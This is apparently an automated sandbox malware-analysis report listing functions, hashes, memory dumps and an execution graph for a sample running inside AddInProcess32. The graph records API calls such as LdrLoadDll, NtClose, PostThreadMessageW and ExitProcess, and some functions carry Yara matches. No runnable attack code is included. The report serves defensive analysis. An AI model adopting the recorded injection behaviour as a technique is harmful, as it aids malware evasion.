                                              • Source File: 00000000.00000002.2749376384.000000000D790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D790000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d790000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0fd5e9d87071f91a5eff8e81142b933f95912d09128d6fe4489b773fcf49ffac
                                              • Instruction ID: f77ac993b136f5dda25e4aacae529993e38a155072b3f9122c1eae545b99de63
                                              • Opcode Fuzzy Hash: 0fd5e9d87071f91a5eff8e81142b933f95912d09128d6fe4489b773fcf49ffac
                                              • Instruction Fuzzy Hash: 95212771E116198BDB08CFAAD8406EEFBF7AFC9320F14C12AD518A7254DB345A018F51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0D7985E0 Relevance: .1, Instructions: 60COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2749376384.000000000D790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D790000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d790000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5a20377ff0c4383dc6334c973d61809e9d23a4090959303ccbd5743ba4c5452c
                                              • Instruction ID: ddb84b9fa2808db52f11b8eb884bbd3e3ce8ab480ecda8c35be9919bfe9f9e6c
                                              • Opcode Fuzzy Hash: 5a20377ff0c4383dc6334c973d61809e9d23a4090959303ccbd5743ba4c5452c
                                              • Instruction Fuzzy Hash: 74112CB1E116198BDB08CFABD94069EFBF7BBC9310F14C03AD518A7214DB3059028F91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0D792B80 Relevance: .1, Instructions: 60COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2749376384.000000000D790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D790000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d790000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3f8f1b9a5dffbcf837b2c15cfd7eb54aec15006d79d2f017e8b2bfde92f15b77
                                              • Instruction ID: f071a998e057b245b2c6eedb79ab620113ab3801fb6b2e995c988ca749eb770c
                                              • Opcode Fuzzy Hash: 3f8f1b9a5dffbcf837b2c15cfd7eb54aec15006d79d2f017e8b2bfde92f15b77
                                              • Instruction Fuzzy Hash: 92112971E116199BDB18CFABE8406EEFBF7BBC9310F14C07AD508A7215DA309A028F54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0D793878 Relevance: .1, Instructions: 60COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2749376384.000000000D790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D790000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d790000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4077ee528d12c7ecda4a7399efaa465f8f2438a8a120592e4e17ef10a5ebdb87
                                              • Instruction ID: e69d7d13f09edc96970422a19595c9817669e71ed450604dadfd9fc2f0316092
                                              • Opcode Fuzzy Hash: 4077ee528d12c7ecda4a7399efaa465f8f2438a8a120592e4e17ef10a5ebdb87
                                              • Instruction Fuzzy Hash: 15112971E116199BDB18CFABE9406AEFBF7EFC8310F14C06AD508A7214DA305A128F61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0D796CF0 Relevance: .1, Instructions: 60COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2749376384.000000000D790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D790000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d790000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: af52faeb839e841363c7b3c77ab77394d3795595ece5a17003defb40be3be6f4
                                              • Instruction ID: 8182041a8c11549c14830b6f80c4b4ef856de6474d8e185793fe62ee2acd2b4e
                                              • Opcode Fuzzy Hash: af52faeb839e841363c7b3c77ab77394d3795595ece5a17003defb40be3be6f4
                                              • Instruction Fuzzy Hash: 76111D71E116188BDB08CFAAD9406DEFBF7AFC9210F14C13AD508A7254D7305A418F51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0D792B71 Relevance: .1, Instructions: 59COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2749376384.000000000D790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D790000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d790000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d49c4359a5aee54abb5b96b5b3d8ca7bcd8ac9debdbfa4da069de06c626d1f7d
                                              • Instruction ID: f4610ff5c37f69efcd9cd5e8c6c1685ea98b9141d8d86b0e9d08f59831a622d9
                                              • Opcode Fuzzy Hash: d49c4359a5aee54abb5b96b5b3d8ca7bcd8ac9debdbfa4da069de06c626d1f7d
                                              • Instruction Fuzzy Hash: 82214A71E116199BDB18CFAAE9406EEFBF3ABC9310F18C06AD408A7255DA304A068B54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0D796CE0 Relevance: .1, Instructions: 55COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2749376384.000000000D790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D790000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d790000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e443c9220ab6e9f97d22605338198c5207c50426265dee643a0f6f38acaf8f46
                                              • Instruction ID: aa4dd1a48e0d86ed1e0a4012aa24037d2057417f50fb7fbbdf70cc1f3bbad6ea
                                              • Opcode Fuzzy Hash: e443c9220ab6e9f97d22605338198c5207c50426265dee643a0f6f38acaf8f46
                                              • Instruction Fuzzy Hash: 28114970E216189BDB58CFABD98069EFBF7AFC9310F14C07AD408A7254DB309A428F55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CF6A8 Relevance: 6.4, Strings: 5, Instructions: 139COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@$B$B$Hnq
                                              • API String ID: 0-3986674910
                                              • Opcode ID: 889f2b7ac22c9ccf2c91adc1c33fdc825b1b034b127003b816b819e1dca713f7
                                              • Instruction ID: 5f873b1c58594f02e578882658d5fb7cc90ed68fa08a14e820e22341ea9d6a99
                                              • Opcode Fuzzy Hash: 889f2b7ac22c9ccf2c91adc1c33fdc825b1b034b127003b816b819e1dca713f7
                                              • Instruction Fuzzy Hash: 8F41AF31B046068FC754CF7DD88456EBBF7AF89261724426ED045C72A1DF709D06C792
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CF698 Relevance: 5.1, Strings: 4, Instructions: 84COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@$B$B
                                              • API String ID: 0-685577651
                                              • Opcode ID: 7aa486b45ec33d818ad1f839db344ab9d2129069c740936073faf4a2c9e57723
                                              • Instruction ID: 43d4e77d40b33fa1cbc29d33d23959f248c4038d76e7e4aa500379b2faa33659
                                              • Opcode Fuzzy Hash: 7aa486b45ec33d818ad1f839db344ab9d2129069c740936073faf4a2c9e57723
                                              • Instruction Fuzzy Hash: 6621AD75B00A068FCB54CF6CC8848AEBBF7AF49212714426ED045DB271DAB0DD41CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:1.2%
                                              Dynamic/Decrypted Code Coverage:4.6%
                                              Signature Coverage:7.2%
                                              Total number of Nodes:152
                                              Total number of Limit Nodes:13
                                              execution_graph 93197 1b02b60 LdrInitializeThunk 93133 423dc3 93134 423ddf 93133->93134 93135 423e07 93134->93135 93136 423e1b 93134->93136 93137 42af73 NtClose 93135->93137 93143 42af73 93136->93143 93140 423e10 93137->93140 93139 423e24 93146 42cf23 RtlAllocateHeap 93139->93146 93142 423e2f 93144 42af8d 93143->93144 93145 42af9e NtClose 93144->93145 93145->93139 93146->93142 93147 4278e3 93148 427940 93147->93148 93149 427977 93148->93149 93152 423803 93148->93152 93151 427959 93153 423820 93152->93153 93155 423826 93152->93155 93153->93151 93154 4238f2 93157 42af73 NtClose 93154->93157 93155->93154 93156 4237e6 93155->93156 93159 4239a5 93155->93159 93156->93151 93158 423999 93157->93158 93158->93151 93160 42af73 NtClose 93159->93160 93162 4239ae 93160->93162 93161 4239da 93161->93151 93162->93161 93165 42ce03 93162->93165 93168 42b2d3 93165->93168 93167 4239ce 93167->93151 93169 42b2f0 93168->93169 93170 42b301 RtlFreeHeap 93169->93170 93170->93167 93171 42dee3 93172 42def3 93171->93172 93173 42def9 93171->93173 93176 42cee3 93173->93176 93175 42df1f 93179 42b283 93176->93179 93178 42cefe 93178->93175 93180 42b29d 93179->93180 93181 42b2ae RtlAllocateHeap 93180->93181 93181->93178 93182 42a583 93183 42a59d 93182->93183 93186 1b02df0 LdrInitializeThunk 93183->93186 93184 42a5c5 93186->93184 93198 424153 93202 424162 93198->93202 93199 4241a6 93200 42ce03 RtlFreeHeap 93199->93200 93201 4241b6 93200->93201 93202->93199 93203 4241e4 93202->93203 93205 4241e9 93202->93205 93204 42ce03 RtlFreeHeap 93203->93204 93204->93205 93187 413aa3 93188 413abd 93187->93188 93190 413ad8 93188->93190 93193 417433 93188->93193 93191 413b1d 93190->93191 93192 413b0c PostThreadMessageW 93190->93192 93192->93191 93194 417457 93193->93194 93195 41745e 93194->93195 93196 417499 LdrLoadDll 93194->93196 93195->93190 93196->93195 93206 41aa93 93207 41aad7 93206->93207 93208 42af73 NtClose 93207->93208 93209 41aaf8 93207->93209 93208->93209 93210 41db93 93211 41dbb9 93210->93211 93215 41dca4 93211->93215 93216 42e013 93211->93216 93213 41dc48 93213->93215 93222 42a5d3 93213->93222 93217 42df83 93216->93217 93218 42dfe0 93217->93218 93219 42cee3 RtlAllocateHeap 93217->93219 93218->93213 93220 42dfbd 93219->93220 93221 42ce03 RtlFreeHeap 93220->93221 93221->93218 93223 42a5f0 93222->93223 93226 1b02c0a 93223->93226 93224 42a61c 93224->93215 93227 1b02c11 93226->93227 93228 1b02c1f LdrInitializeThunk 93226->93228 93227->93224 93228->93224 93229 418638 93230 42af73 NtClose 93229->93230 93231 418642 93230->93231 93232 40199f 93233 4019d4 93232->93233 93236 42e3a3 93233->93236 93239 42ca03 93236->93239 93240 42ca26 93239->93240 93251 4073c3 93240->93251 93242 42ca3c 93250 401aab 93242->93250 93254 41a8a3 93242->93254 93244 42ca5b 93245 42ca70 93244->93245 93269 42b323 93244->93269 93265 427023 93245->93265 93248 42ca7f 93249 42b323 ExitProcess 93248->93249 93249->93250 93272 416173 93251->93272 93253 4073d0 93253->93242 93255 41a8cf 93254->93255 93283 41a793 93255->93283 93258 41a914 93260 41a930 93258->93260 93263 42af73 NtClose 93258->93263 93259 41a8fc 93261 41a907 93259->93261 93262 42af73 NtClose 93259->93262 93260->93244 93261->93244 93262->93261 93264 41a926 93263->93264 93264->93244 93266 42707d 93265->93266 93268 42708a 93266->93268 93294 417f83 93266->93294 93268->93248 93270 42b33d 93269->93270 93271 42b34e ExitProcess 93270->93271 93271->93245 93273 41618a 93272->93273 93275 4161a3 93273->93275 93276 42b9a3 93273->93276 93275->93253 93278 42b9bb 93276->93278 93277 42b9df 93277->93275 93278->93277 93279 42a5d3 LdrInitializeThunk 93278->93279 93280 42ba34 93279->93280 93281 42ce03 RtlFreeHeap 93280->93281 93282 42ba4d 93281->93282 93282->93275 93284 41a7ad 93283->93284 93288 41a889 93283->93288 93289 42a673 93284->93289 93287 42af73 NtClose 93287->93288 93288->93258 93288->93259 93290 42a68d 93289->93290 93293 1b035c0 LdrInitializeThunk 93290->93293 93291 41a87d 93291->93287 93293->93291 93295 417fad 93294->93295 93301 41841b 93295->93301 93302 413bc3 93295->93302 93297 4180ba 93298 42ce03 RtlFreeHeap 93297->93298 93297->93301 93299 4180d2 93298->93299 93300 42b323 ExitProcess 93299->93300 93299->93301 93300->93301 93301->93268 93309 413bdf 93302->93309 93303 413cff 93304 413d33 93303->93304 93314 41abb3 RtlFreeHeap LdrInitializeThunk 93303->93314 93304->93297 93306 413d13 93306->93304 93315 41abb3 RtlFreeHeap LdrInitializeThunk 93306->93315 93308 413d29 93308->93297 93309->93303 93309->93304 93311 413623 93309->93311 93316 42b1f3 93311->93316 93314->93306 93315->93308 93317 42b210 93316->93317 93320 1b02c70 LdrInitializeThunk 93317->93320 93318 413645 93318->93303 93320->93318

                                              Executed Functions

                                              Function 00417433 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 70 417433-41744f 71 417457-41745c 70->71 72 417452 call 42db03 70->72 73 417462-417470 call 42e023 71->73 74 41745e-417461 71->74 72->71 77 417480-417483 73->77 78 417472-41747d call 42e2c3 73->78 80 417489-417491 77->80 81 417484 call 42c4d3 77->81 78->77 83 417493-4174a7 LdrLoadDll 80->83 84 4174aa-4174ad 80->84 81->80 83->84
                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004174A5
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: a22f4c68fb40690f6aa82a7bae27c0e17e67dc67b639a8ad9c0cd0b1a286433b
                                              • Instruction ID: 28a5ef5110c518f0bb9f6d26284fb019041f9202b1953a1f5d3af670e7ec04cc
                                              • Opcode Fuzzy Hash: a22f4c68fb40690f6aa82a7bae27c0e17e67dc67b639a8ad9c0cd0b1a286433b
                                              • Instruction Fuzzy Hash: 290152B5E4010DB7DB10DAE1DC42FDEB7789B54308F004196E90897240F635EB448B55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0042AF73 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 108 42af73-42afac call 404b13 call 42c003 NtClose
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 70e095c47804d4e47fe434aa69db9769bc878d91761dea47003a08f803e02d84
                                              • Instruction ID: 79dadb0be159fd7222fcdaf012651af9ef20d7fd962d2bbeb4e5b7a1b52ed418
                                              • Opcode Fuzzy Hash: 70e095c47804d4e47fe434aa69db9769bc878d91761dea47003a08f803e02d84
                                              • Instruction Fuzzy Hash: 52E086353002147BD220EB5ADC42F9B77ACDFC5754F504019FA0867182C675B91087F4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B02B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 125 1b02b60-1b02b6c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 85069bc0ca7f734c8f2753380ef146745debf78f2c20f2e0f32f9f26a4426048
                                              • Instruction ID: 678d27864f9d364d97f627f551b8c67ca264bf815e5beda357cbe868d719d9ad
                                              • Opcode Fuzzy Hash: 85069bc0ca7f734c8f2753380ef146745debf78f2c20f2e0f32f9f26a4426048
                                              • Instruction Fuzzy Hash: 1F90026325240003410971584414616500AA7E1201B96C061E1014591DC72589916225
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B02DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 127 1b02df0-1b02dfc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: a0cac25d6effdafd3fa2b95039f6e72c6a771678aca9167a969ca07cbee775e7
                                              • Instruction ID: 0a23fe52fe973f0661dc69fcc859182a03ccb36938118b2ef2577260cb960d72
                                              • Opcode Fuzzy Hash: a0cac25d6effdafd3fa2b95039f6e72c6a771678aca9167a969ca07cbee775e7
                                              • Instruction Fuzzy Hash: 3E90023325140413D115715845047071009A7D1241FD6C452A0424559DD7568A52A221
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B02C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 126 1b02c70-1b02c7c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 476c17baec0c5c7bf010f0b63b2e28d9840345f8c1e30a278279e2ff3f3954ae
                                              • Instruction ID: 88162c982c6ca9c0ba46bd51e00e2f82a74fffe900a04918fde5de46da6fe29c
                                              • Opcode Fuzzy Hash: 476c17baec0c5c7bf010f0b63b2e28d9840345f8c1e30a278279e2ff3f3954ae
                                              • Instruction Fuzzy Hash: 7790023325148803D1147158840474A1005A7D1301F9AC451A4424659DC79589917221
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: abb26d8dd4d1b539fae535a3a6fda7389f997848b16cd1ec4cb1720a9dd6e4a1
                                              • Instruction ID: 46cae4ae657655d4b0b43c06dbfa761f0952f0c60ddc3b8bd75c1332d893ec45
                                              • Opcode Fuzzy Hash: abb26d8dd4d1b539fae535a3a6fda7389f997848b16cd1ec4cb1720a9dd6e4a1
                                              • Instruction Fuzzy Hash: 4790023365550403D104715845147062005A7D1201FA6C451A0424569DC7958A5166A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00413A26 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 413a26-413a39 1 413a77-413a7f 0->1 2 413a3b-413a4f 0->2 3 413a58 1->3 4 413a81-413a82 1->4 2->3 5 413a5a-413a6c 3->5 6 413acc-413af3 call 417433 call 404ac3 call 424253 3->6 7 413a85 4->7 8 413afa-413b0a 4->8 10 413ac7 5->10 11 413a6e-413a73 5->11 15 413af8-413af9 6->15 14 413a87-413a9a 7->14 7->15 12 413b2a-413b30 8->12 13 413b0c-413b1b PostThreadMessageW 8->13 10->6 11->1 13->12 17 413b1d-413b27 13->17 15->8 17->12
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: -0o5F4M6$-0o5F4M6
                                              • API String ID: 0-3712027124
                                              • Opcode ID: cd3b7b37252d956e25342e2727a32fbe35d435f8caade712c759b166dc5ad55b
                                              • Instruction ID: a1f07d1f848dd8ef05ad6c6947274151e05be01ccab19d562964bd70f6d6f6e9
                                              • Opcode Fuzzy Hash: cd3b7b37252d956e25342e2727a32fbe35d435f8caade712c759b166dc5ad55b
                                              • Instruction Fuzzy Hash: B821ED32B0D3947ACB019E705C92CEE7F5CCE9239438840EBF8509B242D52E8B0387A9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00413AA1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 23 413aa1-413ad2 call 42cea3 call 42d8b3 29 413ad8-413b0a call 404ac3 call 424253 23->29 30 413ad3 call 417433 23->30 37 413b2a-413b30 29->37 38 413b0c-413b1b PostThreadMessageW 29->38 30->29 38->37 39 413b1d-413b27 38->39 39->37
                                              APIs
                                              • PostThreadMessageW.USER32(-0o5F4M6,00000111,00000000,00000000), ref: 00413B17
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID: -0o5F4M6$-0o5F4M6
                                              • API String ID: 1836367815-3712027124
                                              • Opcode ID: 969f12b64595a8ad57d28e72d026e9fd9e84b1010d3badb3360b2b536a96051b
                                              • Instruction ID: 25c189d035f7cc8f3ed155988edf479b23c40b674e032b66a0018973026f8ffa
                                              • Opcode Fuzzy Hash: 969f12b64595a8ad57d28e72d026e9fd9e84b1010d3badb3360b2b536a96051b
                                              • Instruction Fuzzy Hash: 7B0108B1E0011C7AEB00AAD19C81DEF7B7CDF41694F408059FA1467201E6785E068BB5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00413AA3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 40 413aa3-413ad2 call 42cea3 call 42d8b3 45 413ad8-413b0a call 404ac3 call 424253 40->45 46 413ad3 call 417433 40->46 53 413b2a-413b30 45->53 54 413b0c-413b1b PostThreadMessageW 45->54 46->45 54->53 55 413b1d-413b27 54->55 55->53
                                              APIs
                                              • PostThreadMessageW.USER32(-0o5F4M6,00000111,00000000,00000000), ref: 00413B17
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID: -0o5F4M6$-0o5F4M6
                                              • API String ID: 1836367815-3712027124
                                              • Opcode ID: ddeb76dc530fd286987b32802d0786c60171f6748e77476b3b692a1af314e235
                                              • Instruction ID: 7ff153d97d2ef0b7d74a8b3f4b46cb0c08487cfa39684e1852fe6ae225a0d45b
                                              • Opcode Fuzzy Hash: ddeb76dc530fd286987b32802d0786c60171f6748e77476b3b692a1af314e235
                                              • Instruction Fuzzy Hash: 140108B1E0011C7AEB00AAD19C81DEF7B7CDF41294F408059FA1467201E5785E068BB5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0042B2D3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 65 42b2d3-42b317 call 404b13 call 42c003 RtlFreeHeap
                                              APIs
                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B312
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID: aA
                                              • API String ID: 3298025750-2567749500
                                              • Opcode ID: 474271ea799b3ec72f352060c0fa13b47a61b08fc9f975fe4ee41b58cb4151d8
                                              • Instruction ID: 6de523d7c80248837f5952fb2a04b410cea4f7bd484e0b24f83ca4bd6f4f0634
                                              • Opcode Fuzzy Hash: 474271ea799b3ec72f352060c0fa13b47a61b08fc9f975fe4ee41b58cb4151d8
                                              • Instruction Fuzzy Hash: 60E06D72204204BBE710EF59EC41FAB37ACEFC9710F104419F908A7282D671B9118BB4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041742F Relevance: 1.5, APIs: 1, Instructions: 36libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 86 41742f-417432 87 417434-41745c call 42db03 86->87 88 417489-417491 86->88 94 417462-417470 call 42e023 87->94 95 41745e-417461 87->95 90 417493-417496 88->90 91 4174aa-4174ad 88->91 93 417499-4174a7 LdrLoadDll 90->93 93->91 98 417480-417483 94->98 99 417472-41747d call 42e2c3 94->99 98->88 101 417484 call 42c4d3 98->101 99->98 101->88
                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004174A5
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: 31821f7090cc294354941850f50e1927c8ebe0a6e76b3858bf28c3bde03e2a35
                                              • Instruction ID: 65d91cb780eaca778398782c7bdc59ce41f90f1c68dbbb73fe70fb374ce1d6db
                                              • Opcode Fuzzy Hash: 31821f7090cc294354941850f50e1927c8ebe0a6e76b3858bf28c3bde03e2a35
                                              • Instruction Fuzzy Hash: 8BF090B5E4410EABDF10DED5D842FD9B7B8EB54308F008196ED1C9B340F275AB488B81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0042B283 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 103 42b283-42b2c4 call 404b13 call 42c003 RtlAllocateHeap
                                              APIs
                                              • RtlAllocateHeap.NTDLL(?,0041DC48,?,?,00000000,?,0041DC48,?,?,?), ref: 0042B2BF
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: e828e5af29d6cbfbd5480d928985d5a155fbd5db624940a0c3946598f6886fea
                                              • Instruction ID: 6358b85586c6b16e5bf15f688f59bf8efaf1e9f39c952d14060de89d1ae3d157
